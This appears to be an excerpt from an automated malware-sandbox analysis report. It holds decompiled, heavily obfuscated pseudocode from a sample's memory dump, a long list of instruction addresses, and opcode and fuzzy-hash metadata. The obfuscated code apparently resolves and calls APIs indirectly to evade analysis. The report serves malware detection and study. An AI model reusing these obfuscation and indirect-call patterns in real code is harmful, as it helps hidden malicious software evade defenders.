                  							_t84 = _t554 + 0x41c812; // 0x41c812
                  							 *_t740 =  *_t740 & 0x00000000;
                  							 *_t740 =  *_t740 + _t84;
                  							_t85 = _t554 + 0x41ca65; // 0x41ca65
                  							 *_t740 =  *_t740 & 0x00000000;
                  							 *_t740 =  *_t740 | _t85;
                  							_t443 =  *((intOrPtr*)(_t554 + 0x41f068))(_t575, _t690);
                  							 *(_t726 - 0x14) = _t667;
                  							 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) & 0x00000000;
                  							 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) ^ (_t667 -  *(_t726 - 0x14) | _t443);
                  							_t670 =  *(_t726 - 0x14);
                  							 *_t94 = _t575;
                  							 *_t740 =  *_t740 ^ _t690;
                  							_push( *((intOrPtr*)(_t726 - 8)));
                  							_pop(_t691);
                  							 *((intOrPtr*)(_t726 - 8)) = _t691 +  *(_t726 - 0x10);
                  							_t693 = 0;
                  							_t98 = _t554 + 0x41d15d; // 0x41d15d
                  							 *_t740 =  *_t740 - _t575;
                  							 *_t740 = _t98;
                  							_t99 = _t554 + 0x41c260; // 0x41c260
                  							 *(_t726 - 0x10) = 0;
                  							 *_t740 =  *_t740 | _t99;
                  							_push( *((intOrPtr*)(_t554 + 0x41f068))( *(_t726 - 0x10), _t575));
                  							_pop( *_t103);
                  							_push( *(_t726 - 0x10));
                  							_pop( *_t105);
                  							_push( *((intOrPtr*)(_t670 + 0xc)));
                  							_pop( *_t107);
                  							_push( *(_t726 - 0x14));
                  							_pop(_t576);
                  							 *_t740 =  *_t740 & 0x00000000;
                  							 *_t740 =  *_t740 + _t576;
                  							_t109 = _t554 + 0x41ca52; // 0x41ca52
                  							 *_t740 =  *_t740 - _t554;
                  							 *_t740 =  *_t740 + _t109;
                  							_t449 =  *((intOrPtr*)(_t554 + 0x41f060))(_t554, _t554);
                  							 *(_t726 - 0x14) = _t629;
                  							 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) & 0x00000000;
                  							 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) | _t629 -  *(_t726 - 0x14) ^ _t449;
                  							_t632 =  *(_t726 - 0x14);
                  							_t741 = _t740 - 0xfffffffc;
                  							_push(0);
                  							 *_t741 =  *_t741 | _t449;
                  							_push( *_t740);
                  							_pop(_t450);
                  							 *_t741 = _t450 +  *(_t726 + 8);
                  							_t120 = _t554 + 0x41c07f; // 0x41c07f
                  							 *_t741 = _t120;
                  							_t454 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
                  							 *_t741 =  *_t741 - _t632;
                  							 *_t741 =  *_t741 | _t454;
                  							_t123 = _t554 + 0x41d248; // 0x41d248
                  							 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  							 *_t741 =  *_t741 | _t123;
                  							_t456 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x14), _t632);
                  							_t581 =  *_t741;
                  							_t742 =  &(_t741[1]);
                  							 *(_t726 - 0x10) = _t554;
                  							_push(_t581 + _t456);
                  							_t557 =  *(_t726 - 0x10);
                  							_pop(_t457);
                  							_t583 = _t581 & 0x00000000 ^ _t632 -  *_t742 ^  *(_t557 + 0x41d0e6);
                  							_t635 = _t632;
                  							if(_t583 > _t457) {
                  								_t131 = _t557 + 0x41c07f; // 0x41c07f
                  								 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  								 *_t742 =  *_t742 + _t131;
                  								_t135 = _t557 + 0x41d248; // 0x41d248
                  								 *(_t726 - 0x14) = 0;
                  								 *_t742 =  *_t742 | _t135;
                  								_t457 =  *((intOrPtr*)(_t557 + 0x41f064))( *(_t726 - 0x14),  *(_t726 - 0x14));
                  								 *(_t726 - 0x10) = _t693;
                  								 *((intOrPtr*)(_t557 + 0x41cd68)) = _t457;
                  								_t693 =  *(_t726 - 0x10);
                  							}
                  							_pop( *_t142);
                  							 *_t742 = _t583 & 0x00000000 ^  *(_t726 - 0x10);
                  							_t586 = _t693;
                  							_t694 = _t586 +  *(_t726 + 8);
                  							_t588 = 0;
                  							 *_t742 =  *_t742 & 0x00000000;
                  							 *_t742 =  *_t742 | _t588;
                  							_t145 = _t557 + 0x41d135; // 0x41d135
                  							 *_t742 = _t145;
                  							_t147 = _t557 + 0x41c60e; // 0x41c60e
                  							 *_t742 =  *_t742 & 0x00000000;
                  							 *_t742 =  *_t742 | _t147;
                  							_t460 =  *((intOrPtr*)(_t557 + 0x41f068))(_t588,  *(_t726 - 0x10), _t457);
                  							 *(_t726 - 0x14) = _t635;
                  							 *((intOrPtr*)(_t557 + 0x41c3e6)) = _t460;
                  							_t638 =  *(_t726 - 0x14);
                  							_t590 =  *_t742;
                  							_t743 = _t742 - 0xfffffffc;
                  							 *_t743 =  *_t743 - _t638;
                  							 *_t743 =  *_t743 ^ _t590;
                  							_t152 = _t557 + 0x41c220; // 0x41c220
                  							 *(_t726 - 0x14) = 0;
                  							 *_t743 =  *_t743 + _t152;
                  							_t462 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x14), _t638);
                  							 *(_t726 - 0x10) = _t590;
                  							 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) & 0x00000000;
                  							 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) ^ (_t590 ^  *(_t726 - 0x10) | _t462);
                  							_t463 =  *((intOrPtr*)(_t557 + 0x41f054))();
                  							 *(_t726 - 0x14) = 0;
                  							 *_t743 =  *_t743 + _t463;
                  							_t166 = _t557 + 0x41c49b; // 0x41c49b
                  							 *(_t726 - 0x10) = 0;
                  							 *_t743 =  *_t743 + _t166;
                  							_t465 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
                  							 *(_t726 - 0x14) = _t694;
                  							 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) & 0x00000000;
                  							 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) | _t694 & 0x00000000 ^ _t465;
                  							_t697 =  *(_t726 - 0x14);
                  							_t744 = _t743 - 0xfffffffc;
                  							 *(_t726 - 0x10) = _t638;
                  							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
                  							 *(_t726 - 4) =  *(_t726 - 4) ^ _t638 -  *(_t726 - 0x10) ^ _t465 & 0x00000000 ^  *_t743;
                  							_t641 =  *(_t726 - 0x10);
                  							_t183 = _t557 + 0x41c279; // 0x41c279
                  							 *_t744 = _t183;
                  							_t185 = _t557 + 0x41d1ea; // 0x41d1ea
                  							 *_t744 =  *_t744 - _t697;
                  							 *_t744 = _t185;
                  							_t470 =  *((intOrPtr*)(_t557 + 0x41f068))(_t697,  *(_t726 - 0x14));
                  							 *(_t726 - 0x14) =  *(_t726 - 0x10);
                  							 *(_t557 + 0x41cbc5) = 0 ^ _t470;
                  							_t596 =  *(_t726 - 0x14);
                  							goto L11;
                  						}
                  						 *_t744 =  *_t744 ^ _t510;
                  						_t542 = _t510;
                  						return _t542;
                  					}
                  				}
                  			}

























































































































                  0x03055378
                  0x03055378
                  0x03055378
                  0x0305537e
                  0x0305537f
                  0x03055382
                  0x03055385
                  0x0305538b
                  0x0305538c
                  0x0305538f
                  0x03055398
                  0x03055399
                  0x0305539d
                  0x030553a0
                  0x030553af
                  0x030553b2
                  0x030553b9
                  0x030553ba
                  0x030553bd
                  0x030553be
                  0x030553cb
                  0x030553d0
                  0x030553d9
                  0x030553dd
                  0x030553e6
                  0x030553ed
                  0x030553f0
                  0x030553f0
                  0x030553f7
                  0x030553fd
                  0x03055403
                  0x03055403
                  0x03055405
                  0x0305540b
                  0x0305540c
                  0x03055413
                  0x03055417
                  0x0305541a
                  0x03055421
                  0x03055424
                  0x03055427
                  0x03055433
                  0x0305543a
                  0x03055440
                  0x03055441
                  0x03055445
                  0x03055445
                  0x03055448
                  0x0305544f
                  0x03055452
                  0x03055455
                  0x0305545d
                  0x03055464
                  0x0305546a
                  0x0305546b
                  0x0305546e
                  0x03055477
                  0x0305547a
                  0x03055480
                  0x03055487
                  0x0305548a
                  0x03055491
                  0x03055495
                  0x03055498
                  0x030554a0
                  0x030554a3
                  0x030554aa
                  0x030554ad
                  0x030554b0
                  0x030554b3
                  0x030554b4
                  0x030554b5
                  0x030554c4
                  0x030554c6
                  0x030554cb
                  0x030554cd
                  0x030554d6
                  0x030554d9
                  0x030554df
                  0x030554e6
                  0x030554e9
                  0x030554e9
                  0x030554ef
                  0x030554f7
                  0x030554fe
                  0x03055504
                  0x03055507
                  0x03055515
                  0x03055519
                  0x0305551d
                  0x03055520
                  0x03055527
                  0x0305552b
                  0x0305552e
                  0x03055535
                  0x03055539
                  0x0305553c
                  0x03055542
                  0x0305554a
                  0x03055551
                  0x03055557
                  0x0305555a
                  0x03055562
                  0x03055565
                  0x03055568
                  0x0305556b
                  0x0305556e
                  0x0305556f
                  0x03055576
                  0x03055579
                  0x0305557c
                  0x03055582
                  0x0305558c
                  0x03055595
                  0x03055596
                  0x03055599
                  0x0305559c
                  0x030555a2
                  0x030555a5
                  0x030555a8
                  0x030555ab
                  0x030555ad
                  0x030555b1
                  0x030555b4
                  0x030555bb
                  0x030555be
                  0x030555c1
                  0x030555c7
                  0x030555cf
                  0x030555d6
                  0x030555dc
                  0x030555e8
                  0x030555eb
                  0x030555ed
                  0x030555f0
                  0x030555f1
                  0x030555fb
                  0x030555fe
                  0x03055607
                  0x0305560a
                  0x03055611
                  0x03055614
                  0x03055617
                  0x0305561d
                  0x03055624
                  0x03055627
                  0x0305562f
                  0x03055632
                  0x03055635
                  0x0305563c
                  0x0305563d
                  0x03055640
                  0x0305564e
                  0x03055650
                  0x03055653
                  0x03055655
                  0x0305565b
                  0x03055662
                  0x03055665
                  0x0305566b
                  0x03055675
                  0x03055678
                  0x0305567e
                  0x03055685
                  0x0305568b
                  0x0305568b
                  0x03055694
                  0x0305569c
                  0x030556a0
                  0x030556a4
                  0x030556a6
                  0x030556a8
                  0x030556ac
                  0x030556af
                  0x030556b8
                  0x030556bb
                  0x030556c2
                  0x030556c6
                  0x030556c9
                  0x030556cf
                  0x030556d6
                  0x030556dc
                  0x030556e1
                  0x030556e4
                  0x030556e8
                  0x030556eb
                  0x030556ee
                  0x030556f4
                  0x030556fe
                  0x03055701
                  0x03055707
                  0x0305570f
                  0x03055716
                  0x0305571f
                  0x03055725
                  0x0305572f
                  0x03055732
                  0x03055738
                  0x03055742
                  0x03055745
                  0x0305574b
                  0x03055753
                  0x0305575a
                  0x03055760
                  0x0305576c
                  0x0305576f
                  0x03055777
                  0x0305577b
                  0x0305577e
                  0x03055781
                  0x0305578a
                  0x0305578d
                  0x03055794
                  0x03055797
                  0x0305579a
                  0x030557a0
                  0x030557a7
                  0x030557ad
                  0x030557b0
                  0x030557b0
                  0x030557b6
                  0x03055a4d
                  0x03055a51
                  0x03055a59
                  0x03055a5c
                  0x03055a5f
                  0x03055a67
                  0x03055a6e
                  0x03055a74
                  0x03055a75
                  0x03055a7f
                  0x03055a83
                  0x03055a8d
                  0x03055a91
                  0x03055a94
                  0x03055a9a
                  0x03055aa1
                  0x03055aa7
                  0x03055aaa
                  0x03055ab8
                  0x03055abb
                  0x03055ac5
                  0x03055ac9
                  0x03055acc
                  0x03055ad2
                  0x03055ada
                  0x03055ae1
                  0x03055ae7
                  0x030557bc
                  0x030557bc
                  0x030557c3
                  0x030557c6
                  0x030557c9
                  0x030557cf
                  0x030557d9
                  0x030557dc
                  0x030557e3
                  0x030557e6
                  0x030557e9
                  0x030557f5
                  0x030557f8
                  0x030557fd
                  0x03055801
                  0x03055804
                  0x03055806
                  0x03055807
                  0x03055816
                  0x03055818
                  0x0305581d
                  0x0305581f
                  0x03055826
                  0x0305582a
                  0x0305582d
                  0x03055836
                  0x03055839
                  0x03055839
                  0x03055845
                  0x0305584c
                  0x03055852
                  0x03055854
                  0x03055858
                  0x0305585b
                  0x03055864
                  0x0305586d
                  0x0305586e
                  0x03055871
                  0x03055874
                  0x0305587a
                  0x0305587c
                  0x03055883
                  0x03055887
                  0x0305588a
                  0x03055890
                  0x0305589a
                  0x0305589d
                  0x030558a3
                  0x030558aa
                  0x030558ad
                  0x030558b9
                  0x030558bc
                  0x030558c3
                  0x030558c6
                  0x030558c9
                  0x030558cc
                  0x030558cd
                  0x030558ce
                  0x030558dd
                  0x030558df
                  0x030558e4
                  0x030558e6
                  0x030558ef
                  0x030558f2
                  0x030558f9
                  0x030558fd
                  0x03055900
                  0x03055900
                  0x03055908
                  0x0305590f
                  0x03055915
                  0x03055918
                  0x0305591c
                  0x03055920
                  0x03055922
                  0x03055923
                  0x03055929
                  0x03055930
                  0x03055933
                  0x03055939
                  0x03055943
                  0x03055946
                  0x0305594c
                  0x03055954
                  0x0305595b
                  0x0305596f
                  0x03055970
                  0x03055977
                  0x0305597b
                  0x0305597e
                  0x03055987
                  0x0305598a
                  0x03055996
                  0x0305599d
                  0x030559a3
                  0x030559a4
                  0x030559a5
                  0x030559a8
                  0x030559ab
                  0x030559ae
                  0x030559b4
                  0x030559bb
                  0x030559be
                  0x030559c7
                  0x030559ca
                  0x030559d2
                  0x030559d9
                  0x030559df
                  0x030559e2
                  0x030559e5
                  0x030559e8
                  0x030559ef
                  0x030559f3
                  0x030559f6
                  0x030559ff
                  0x03055a02
                  0x03055a08
                  0x03055a10
                  0x03055a17
                  0x03055a1d
                  0x03055a1d
                  0x03055aea
                  0x03055af8
                  0x03055afb
                  0x03055b01
                  0x03055b0b
                  0x03055b0e
                  0x03055b17
                  0x03055b1a
                  0x03055b23
                  0x03055b26
                  0x03055b35
                  0x03055b3a
                  0x03055b3e
                  0x03055b41
                  0x03055b43
                  0x03055b44
                  0x03055b4f
                  0x03055b51
                  0x03055b56
                  0x03055b58
                  0x03055b5f
                  0x03055b63
                  0x03055b66
                  0x03055b6c
                  0x03055b73
                  0x03055b76
                  0x03055b76
                  0x03055b7d
                  0x03055b83
                  0x03055b8e
                  0x03055b92
                  0x03055b93
                  0x03055b9c
                  0x03055b9f
                  0x03055ba5
                  0x03055baf
                  0x03055bb2
                  0x03055bbe
                  0x03055bc5
                  0x03055bcb
                  0x03055bcc
                  0x03055bda
                  0x03055bde
                  0x03055be1
                  0x03055be4
                  0x03055beb
                  0x03055bee
                  0x03055bf1
                  0x03055bf7
                  0x03055bfe
                  0x03055c01
                  0x03055c07
                  0x03055c0f
                  0x03055c16
                  0x03055c1c
                  0x03055c28
                  0x03055c2b
                  0x03055c35
                  0x03055c38
                  0x03055c3e
                  0x03055c48
                  0x03055c4b
                  0x03055c52
                  0x03055c56
                  0x03055c59
                  0x03055c65
                  0x03055c6c
                  0x03055c72
                  0x03055c73
                  0x03055c79
                  0x03055c83
                  0x03055c86
                  0x03055c8c
                  0x03055c96
                  0x03055c99
                  0x03055c9f
                  0x03055ca9
                  0x03055cac
                  0x03055cb2
                  0x03055cbc
                  0x03055cbf
                  0x03055ccb
                  0x03055cce
                  0x03055cd5
                  0x03055cd8
                  0x03055cdb
                  0x03055cde
                  0x03055cdf
                  0x03055ce0
                  0x03055cef
                  0x03055cf1
                  0x03055cf6
                  0x03055cf8
                  0x03055cff
                  0x03055d03
                  0x03055d06
                  0x03055d0c
                  0x03055d16
                  0x03055d19
                  0x03055d25
                  0x03055d2c
                  0x03055d32
                  0x03055d32
                  0x03055d3c
                  0x03055d40
                  0x03055d43
                  0x03055d48
                  0x03055d52
                  0x03055d55
                  0x03055d5c
                  0x03055d5e
                  0x03055d61
                  0x03055d68
                  0x03055d6f
                  0x03055d74
                  0x03055d77
                  0x03055d7a
                  0x03055d7d
                  0x03055d7e
                  0x03055d85
                  0x03055d88
                  0x03055d8b
                  0x03055d8e
                  0x03055d91
                  0x03055d92
                  0x03055da4
                  0x03055da6
                  0x03055daa
                  0x03055314
                  0x00000000
                  0x0305531a
                  0x0305531a
                  0x03055320
                  0x0305532a
                  0x0305532d
                  0x03055333
                  0x0305533a
                  0x03055343
                  0x03055346
                  0x03055349
                  0x0305534c
                  0x0305534d
                  0x03055356
                  0x03055359
                  0x03055365
                  0x0305536c
                  0x03055372
                  0x03055372
                  0x03055445
                  0x03055445
                  0x03055448
                  0x0305544f
                  0x03055452
                  0x03055455
                  0x0305545d
                  0x03055464
                  0x0305546a
                  0x0305546b
                  0x0305546e
                  0x03055477
                  0x0305547a
                  0x03055480
                  0x03055487
                  0x0305548a
                  0x03055491
                  0x03055495
                  0x03055498
                  0x030554a0
                  0x030554a3
                  0x030554aa
                  0x030554ad
                  0x030554b0
                  0x030554b3
                  0x030554b4
                  0x030554b5
                  0x030554c4
                  0x030554c6
                  0x030554cb
                  0x030554cd
                  0x030554d6
                  0x030554d9
                  0x030554df
                  0x030554e6
                  0x030554e9
                  0x030554e9
                  0x030554ef
                  0x030554f7
                  0x030554fe
                  0x03055504
                  0x03055507
                  0x03055515
                  0x03055519
                  0x0305551d
                  0x03055520
                  0x03055527
                  0x0305552b
                  0x0305552e
                  0x03055535
                  0x03055539
                  0x0305553c
                  0x03055542
                  0x0305554a
                  0x03055551
                  0x03055557
                  0x0305555a
                  0x03055562
                  0x03055565
                  0x03055568
                  0x0305556b
                  0x0305556e
                  0x0305556f
                  0x03055576
                  0x03055579
                  0x0305557c
                  0x03055582
                  0x0305558c
                  0x03055595
                  0x03055596
                  0x03055599
                  0x0305559c
                  0x030555a2
                  0x030555a5
                  0x030555a8
                  0x030555ab
                  0x030555ad
                  0x030555b1
                  0x030555b4
                  0x030555bb
                  0x030555be
                  0x030555c1
                  0x030555c7
                  0x030555cf
                  0x030555d6
                  0x030555dc
                  0x030555e8
                  0x030555eb
                  0x030555ed
                  0x030555f0
                  0x030555f1
                  0x030555fb
                  0x030555fe
                  0x03055607
                  0x0305560a
                  0x03055611
                  0x03055614
                  0x03055617
                  0x0305561d
                  0x03055624
                  0x03055627
                  0x0305562f
                  0x03055632
                  0x03055635
                  0x0305563c
                  0x0305563d
                  0x03055640
                  0x0305564e
                  0x03055650
                  0x03055653
                  0x03055655
                  0x0305565b
                  0x03055662
                  0x03055665
                  0x0305566b
                  0x03055675
                  0x03055678
                  0x0305567e
                  0x03055685
                  0x0305568b
                  0x0305568b
                  0x03055694
                  0x0305569c
                  0x030556a0
                  0x030556a4
                  0x030556a6
                  0x030556a8
                  0x030556ac
                  0x030556af
                  0x030556b8
                  0x030556bb
                  0x030556c2
                  0x030556c6
                  0x030556c9
                  0x030556cf
                  0x030556d6
                  0x030556dc
                  0x030556e1
                  0x030556e4
                  0x030556e8
                  0x030556eb
                  0x030556ee
                  0x030556f4
                  0x030556fe
                  0x03055701
                  0x03055707
                  0x0305570f
                  0x03055716
                  0x0305571f
                  0x03055725
                  0x0305572f
                  0x03055732
                  0x03055738
                  0x03055742
                  0x03055745
                  0x0305574b
                  0x03055753
                  0x0305575a
                  0x03055760
                  0x0305576c
                  0x0305576f
                  0x03055777
                  0x0305577b
                  0x0305577e
                  0x03055781
                  0x0305578a
                  0x0305578d
                  0x03055794
                  0x03055797
                  0x0305579a
                  0x030557a0
                  0x030557a7
                  0x030557ad
                  0x00000000
                  0x030557ad
                  0x03055dbb
                  0x03055dbe
                  0x03055dd0
                  0x03055dd0
                  0x03055441

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 86a651931a01c3be3bd58236517675960697cf91adc10e4db860c8d0544b250d
                  • Instruction ID: a38cdb0b72273759050825bddb368c20f07c4f821b2c4d8a1254ec874a19b00b
                  • Opcode Fuzzy Hash: 86a651931a01c3be3bd58236517675960697cf91adc10e4db860c8d0544b250d
                  • Instruction Fuzzy Hash: 4E724472844219DFEF04DFA0C9897EEBBF1FF08311F19486ED889AA145D7341664CB6A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E030531B3(signed int __ebx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _t312;
                  				void* _t314;
                  				signed int _t315;
                  				signed int _t318;
                  				signed int _t321;
                  				void* _t323;
                  				void* _t327;
                  				void* _t331;
                  				void* _t333;
                  				void* _t334;
                  				signed int _t335;
                  				signed int _t337;
                  				void* _t339;
                  				void* _t340;
                  				signed int _t345;
                  				signed int _t348;
                  				void* _t350;
                  				void* _t351;
                  				signed int _t355;
                  				void* _t357;
                  				intOrPtr _t358;
                  				signed int _t359;
                  				signed int _t361;
                  				signed int _t365;
                  				signed int _t371;
                  				signed int _t373;
                  				void* _t378;
                  				void* _t380;
                  				signed int _t383;
                  				signed int _t386;
                  				intOrPtr _t390;
                  				signed int _t396;
                  				signed int _t398;
                  				signed int _t402;
                  				signed int _t405;
                  				void* _t408;
                  				void* _t410;
                  				signed int _t416;
                  				intOrPtr _t421;
                  				signed int _t426;
                  				intOrPtr _t429;
                  				intOrPtr _t434;
                  				signed int _t437;
                  				void* _t442;
                  				void* _t444;
                  				signed int _t446;
                  				signed int _t448;
                  				signed int _t450;
                  				signed int _t452;
                  				signed int _t454;
                  				signed int _t457;
                  				signed int _t463;
                  				signed int _t465;
                  				signed int _t468;
                  				signed int _t473;
                  				signed int _t480;
                  				signed int _t483;
                  				signed int _t486;
                  				signed int _t487;
                  				signed int _t488;
                  				signed int _t500;
                  				signed int _t502;
                  				signed int _t505;
                  				signed int _t507;
                  				signed int _t510;
                  				void* _t514;
                  				signed int _t516;
                  				signed int _t519;
                  				signed int _t522;
                  				signed int _t525;
                  				signed int _t531;
                  				signed int _t534;
                  				signed int _t537;
                  				signed int _t540;
                  				void* _t541;
                  				signed int _t543;
                  				signed int _t546;
                  				void* _t553;
                  				signed int _t555;
                  				signed int _t557;
                  				signed int _t560;
                  				signed int _t563;
                  				signed int _t566;
                  				void* _t570;
                  				signed int _t573;
                  				void* _t574;
                  				signed int _t576;
                  				signed int _t579;
                  				signed int* _t580;
                  				signed int* _t581;
                  				signed int* _t582;
                  				signed int* _t583;
                  				signed int* _t584;
                  				signed int* _t585;
                  				signed int* _t586;
                  				signed int* _t587;
                  				signed int* _t588;
                  				signed int* _t589;
                  				signed int* _t590;
                  				signed int* _t591;
                  				signed int* _t592;
                  				signed int* _t593;
                  				signed int* _t594;
                  				signed int* _t596;
                  
                  				_t531 = __edi;
                  				_t500 = __edx;
                  				_t437 = __ebx;
                  				_t1 = _t437 + 0x41c972; // 0x41c972
                  				_push(_v16);
                  				 *_t580 = _t1;
                  				_t312 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_push(_t573);
                  				 *_t580 =  *_t580 - _t573;
                  				 *_t580 = _t312;
                  				_t4 = _t437 + 0x41c726; // 0x41c726
                  				_v12 = 0;
                  				_push(_v12);
                  				 *_t580 =  *_t580 | _t4;
                  				_t314 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_t446 =  *_t580;
                  				_t581 =  &(_t580[1]);
                  				 *_t581 =  *_t581 + __esi;
                  				_t553 = _t314;
                  				_t315 = _t553 + _t446;
                  				_t555 = 0;
                  				_v16 = _t315;
                  				_t448 = _t446 & 0x00000000 | _t315 & 0x00000000 |  *(__ebx + 0x41c68d);
                  				_t318 = _v16;
                  				if(_t448 > _t318) {
                  					_t11 = _t437 + 0x41c972; // 0x41c972
                  					_v16 = 0;
                  					_push(_v16);
                  					 *_t581 =  *_t581 | _t11;
                  					_t14 = _t437 + 0x41c726; // 0x41c726
                  					_push(_t573);
                  					 *_t581 =  *_t581 - _t573;
                  					 *_t581 =  *_t581 ^ _t14;
                  					_t318 =  *((intOrPtr*)(__ebx + 0x41f064))();
                  				}
                  				_v12 = _t531;
                  				 *(_t437 + 0x41c3b5) =  *(_t437 + 0x41c3b5) & 0x00000000;
                  				 *(_t437 + 0x41c3b5) =  *(_t437 + 0x41c3b5) | _t531 & 0x00000000 ^ _t318;
                  				_t534 = _v12;
                  				_t22 = _t437 + 0x41d2f2; // 0x41d2f2
                  				 *_t581 =  *_t581 & 0x00000000;
                  				 *_t581 =  *_t581 + _t22;
                  				_t23 = _t437 + 0x41d08b; // 0x41d08b
                  				_v12 = _v12 & 0x00000000;
                  				 *_t581 =  *_t581 | _t23;
                  				_t321 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _t500);
                  				 *_t581 =  *_t581 & 0x00000000;
                  				 *_t581 =  *_t581 | _t321;
                  				_t28 = _t437 + 0x41c1f0; // 0x41c1f0
                  				 *_t581 =  *_t581 & 0x00000000;
                  				 *_t581 =  *_t581 | _t28;
                  				_t323 =  *((intOrPtr*)(_t437 + 0x41f060))(_t555);
                  				 *_t30 = _t448;
                  				 *_t581 =  *_t581 | _t573;
                  				_t574 = _t323;
                  				_t576 = 0;
                  				 *_t581 = _t574 + _v8;
                  				_t450 =  *(_t437 + 0x41c529);
                  				_t327 = 0;
                  				if(_t450 > _t327) {
                  					_t33 = _t437 + 0x41d08b; // 0x41d08b
                  					 *_t581 =  *_t581 ^ _t500;
                  					 *_t581 =  *_t581 ^ _t33;
                  					_t34 = _t437 + 0x41c1f0; // 0x41c1f0
                  					_v16 = 0;
                  					 *_t581 =  *_t581 | _t34;
                  					_t434 =  *((intOrPtr*)(_t437 + 0x41f064))(_v16, _t500);
                  					_v16 = _t450;
                  					 *((intOrPtr*)(_t437 + 0x41cd05)) = _t434;
                  					_t450 = _v16;
                  				}
                  				_t582 = _t581 - 0xfffffffc;
                  				 *_t582 =  *_t582 ^ _t576;
                  				 *_t582 =  *_t582 +  *_t581;
                  				_t41 = _t437 + 0x41d1b0; // 0x41d1b0
                  				 *_t582 =  *_t582 & 0x00000000;
                  				 *_t582 =  *_t582 + _t41;
                  				_t331 =  *((intOrPtr*)(_t437 + 0x41f060))(_t576, _t576);
                  				 *_t582 =  *_t582 & 0x00000000;
                  				 *_t582 =  *_t582 + _t331;
                  				_t43 = _t437 + 0x41c2f3; // 0x41c2f3
                  				 *_t582 =  *_t582 ^ _t555;
                  				 *_t582 =  *_t582 ^ _t43;
                  				_t333 =  *((intOrPtr*)(_t437 + 0x41f060))(_t555, _t500);
                  				_t452 = _t450 & 0x00000000 ^  *_t582;
                  				_t583 =  &(_t582[1]);
                  				 *_t45 = _t333;
                  				_v8 = _v8 + _t452;
                  				_push(_v8);
                  				_pop(_t334);
                  				_t502 = _t500;
                  				_v16 = _t502;
                  				_t454 = _t452 & 0x00000000 | _t502 & 0x00000000 |  *(_t437 + 0x41c51d);
                  				_t505 = _v16;
                  				if(_t454 > _t334) {
                  					_t52 = _t437 + 0x41d1b0; // 0x41d1b0
                  					 *_t583 =  *_t583 & 0x00000000;
                  					 *_t583 =  *_t583 ^ _t52;
                  					_t53 = _t437 + 0x41c2f3; // 0x41c2f3
                  					 *_t583 =  *_t583 - _t454;
                  					 *_t583 = _t53;
                  					_t334 =  *((intOrPtr*)(_t437 + 0x41f064))(_t454, _t505);
                  				}
                  				 *_t55 = _t334;
                  				_push(_v16);
                  				_pop( *_t57);
                  				_t335 =  *((intOrPtr*)(_t437 + 0x41f060))();
                  				_v16 = _v16 & 0x00000000;
                  				 *_t583 =  *_t583 ^ _t335;
                  				_t62 = _t437 + 0x41c0f2; // 0x41c0f2
                  				 *_t583 =  *_t583 - _t505;
                  				 *_t583 = _t62;
                  				_t337 =  *((intOrPtr*)(_t437 + 0x41f060))(_t505, _v16);
                  				 *_t583 = _t337;
                  				_t65 = _t437 + 0x41cfb1; // 0x41cfb1
                  				 *_t583 = _t65;
                  				_t339 =  *((intOrPtr*)(_t437 + 0x41f060))(_v8, _v16);
                  				_t584 = _t583 - 0xfffffffc;
                  				 *_t68 = _t339;
                  				_v16 = _v16 + (_t454 & 0x00000000 |  *_t583);
                  				_push(_v16);
                  				_pop(_t340);
                  				_t557 = _t555;
                  				_v8 = _t557;
                  				_t457 = 0 ^  *(_t437 + 0x41cba2);
                  				_t560 = _v8;
                  				if(_t457 > _t340) {
                  					_t75 = _t437 + 0x41c0f2; // 0x41c0f2
                  					_v16 = _v16 & 0x00000000;
                  					 *_t584 =  *_t584 ^ _t75;
                  					_t79 = _t437 + 0x41cfb1; // 0x41cfb1
                  					_v8 = _v8 & 0x00000000;
                  					 *_t584 =  *_t584 ^ _t79;
                  					_t429 =  *((intOrPtr*)(_t437 + 0x41f064))(_v8, _v16);
                  					_v8 = _t505;
                  					 *((intOrPtr*)(_t437 + 0x41cbd5)) = _t429;
                  					_t505 = _v8;
                  				}
                  				_pop( *_t87);
                  				 *_t584 =  *_t584 - _t534;
                  				 *_t584 =  *_t584 ^ 0 ^ _v8;
                  				_t89 = _t437 + 0x41cdc3; // 0x41cdc3
                  				_v8 = 0;
                  				 *_t584 =  *_t584 + _t89;
                  				_t92 = _t437 + 0x41c7d0; // 0x41c7d0
                  				_v16 = 0;
                  				 *_t584 =  *_t584 | _t92;
                  				_t345 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _v8, _t534);
                  				_v12 = _t457;
                  				 *(_t437 + 0x41cb83) =  *(_t437 + 0x41cb83) & 0x00000000;
                  				 *(_t437 + 0x41cb83) =  *(_t437 + 0x41cb83) ^ (_t457 - _v12 | _t345);
                  				_t103 = _t437 + 0x41d16f; // 0x41d16f
                  				_v16 = _v16 & 0x00000000;
                  				 *_t584 =  *_t584 ^ _t103;
                  				_t107 = _t437 + 0x41cd88; // 0x41cd88
                  				 *_t584 =  *_t584 & 0x00000000;
                  				 *_t584 =  *_t584 ^ _t107;
                  				_t348 =  *((intOrPtr*)(_t437 + 0x41f060))(_t505, _v16);
                  				_v16 = _v16 & 0x00000000;
